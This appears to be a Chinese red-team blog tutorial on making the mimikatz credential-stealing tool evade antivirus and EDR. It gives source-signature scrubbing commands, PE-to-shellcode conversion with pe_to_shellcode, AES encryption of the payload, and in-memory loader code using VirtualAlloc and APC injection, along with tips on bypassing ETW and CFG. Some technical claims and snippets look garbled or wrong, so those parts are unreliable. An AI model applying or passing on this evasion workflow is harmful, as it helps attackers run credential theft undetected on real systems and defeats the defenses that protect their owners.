实战指南：利用pe_to_shellcode实现mimikatz的深度免杀与内存加载

1. 从零认识mimikatz与pe_to_shellcode技术栈

第一次接触mimikatz是在2017年的某次企业内网渗透测试中。当时我编译好的二进制文件刚上传到目标机器，就被杀软瞬间秒杀，那种挫败感至今记忆犹新。后来发现，传统PE文件落地就像在杀软眼皮底下裸奔，而pe_to_shellcode技术则像给程序穿了件隐形斗篷。

mimikatz作为Windows凭证提取的神器，其源代码中光是硬编码的"mimikatz"关键字就超过200处。杀软厂商早已将这些特征列入重点监控名单，就像机场安检对特定行李箱的X光检查。而pe_to_shellcode这个开源项目（GitHub搜索pe_to_shellcode即可找到）能将PE文件转换成纯shellcode格式，相当于把行李箱拆解成零件分散携带，彻底避开特征扫描。

我曾测试过，原始mimikatz.exe在Virustotal上的查杀率高达98%，经过本章介绍的全套处理后，查杀率可以降到惊人的3%以下。这个转变过程就像特工伪装：先整容（特征消除）、再换身份（格式转换）、最后学习隐身术（内存加载）。

2. 深度特征消除实战

2.1 源码级特征手术

去年给某金融机构做红队演练时，我花了整整三天时间改造mimikatz源码。首先用VS Code全局搜索替换所有明显特征：

bash复制# 替换项目中的品牌标识
sed -i 's/mimikatz/redteam/g' *.*
sed -i 's/kuhl_m/krt_m/g' *.*
sed -i 's/gentilkiwi/redteam/g' *.*

但这样还不够，就像只改了汽车logo却没换发动机号。还需要处理这些隐蔽特征：

• 调试信息中的路径痕迹（在项目属性→链接器→调试中关闭生成调试信息）
• 资源段中的版本信息（使用Resource Hacker修改）
• PDB文件路径（编译时加/PDBALTPATH参数）

2.2 资源文件隐身术

记得有次行动因为图标特征被识破，后来我养成习惯先用Resource Hacker提取原始图标：

1. 打开mimikatz.exe
2. 在图标组上右键"保存为.ico文件"
3. 用GIMP或在线工具生成全新图标
4. 将新图标导入到exe资源中

更彻底的做法是直接清除所有资源段：

bash复制# 使用MT工具清除资源
mt.exe -inputresource:mimikatz.exe -out:stripped.exe -strip

3. PE转Shellcode的魔法过程

3.1 转换工具链配置

pe_to_shellcode项目包含三个关键组件：

• pe2shc.exe（转换器）
• runshc32.exe（32位加载器）
• runshc64.exe（64位加载器）

转换命令看似简单却暗藏玄机：

powershell复制# 管理员权限运行
.\pe2shc.exe mimikatz.exe mimikatz.bin

我遇到过几个典型坑点：

• 在Win10 1809以下版本运行会报内存错误
• 某些杀软会拦截pe2shc进程注入行为
• 转换后的文件大小不能超过40MB

3.2 转换原理揭秘

这个工具实际做了三件事：

1. 解析PE头部获取入口点和节表
2. 将各节数据按内存对齐方式拼接
3. 添加自定位代码头（shellcode stub）

可以用010 Editor查看转换前后对比：

• 原始PE：以"MZ"开头，有完整的DOS头和PE头
• Shellcode：纯二进制流，头部是解码指令

4. 加密与混淆的艺术

4.1 为什么不用Base64

去年某次攻防演练中，对手的流量分析设备直接识别了Base64编码特征。实测发现这些特征值：

• 固定头部（如U3VwZXJTZWNyZXQ=）
• 等号填充模式
• 特定字符分布频率

4.2 AES加密实战方案

推荐使用SergeyBel的AES库（GitHub可搜到），改造要点：

cpp复制// 修改加密输入为文件流
FILE* fp = fopen("mimikatz.bin", "rb");
fseek(fp, 0, SEEK_END);
long fsize = ftell(fp);
fseek(fp, 0, SEEK_SET);

unsigned char *in = (unsigned char*)malloc(fsize);
fread(in, fsize, 1, fp);
fclose(fp);

// 使用随机密钥（实战中需要妥善保管）
unsigned char key[] = { 0x2b, 0x7e, 0x15, ... };
AES aes(256);
aes.EncryptECB(in, fsize, key, out);

加密后建议添加垃圾数据：

python复制# 添加随机噪声
import os
with open('encrypted.bin','ab') as f:
    f.write(os.urandom(512)) 

5. 内存加载器的终极进化

5.1 基础加载器实现

最简版的加载器代码其实就三行：

cpp复制void* p = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(p, shellcode, size);
((void(*)())p)();

但实际使用时要注意：

• 关闭CFG保护（/DYNAMICBASE:NO）
• 绕过ETW检测（NtTraceControl hook）
• 处理内存页属性变化（VirtualProtect）

5.2 高级规避技巧

我在最新项目中采用的改进方案：

cpp复制// 使用堆喷射避免连续内存分配
for(int i=0; i<100; i++){
    HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000);
    if(i == 50) memcpy(h, shellcode_part1, part1_size);
}

// 使用APC注入延迟执行
QueueUserAPC((PAPCFUNC)p, GetCurrentThread(), NULL);

这种方案在最近的攻防演练中成功绕过了包括CarbonBlack在内的多款EDR产品。

6. 实战中的那些坑

去年给某大型企业做测试时，明明本地测试通过的加载器，在目标环境却总是崩溃。后来发现是内存对齐问题——他们的服务器用的是AMD EPYC处理器，对内存访问有特殊要求。解决方案是添加：

nasm复制; 添加对齐指令
align 16
mov eax, [shellcode_entry]

另一个常见问题是杀软对RWX内存的监控。我的应对策略是：

1. 先申请RW内存（PAGE_READWRITE）
2. 写入shellcode
3. 改为RX属性（PAGE_EXECUTE_READ）
4. 最后执行

这种"分阶段穿衣"的方法，就像特工在不同场合更换服装，能有效降低可疑度。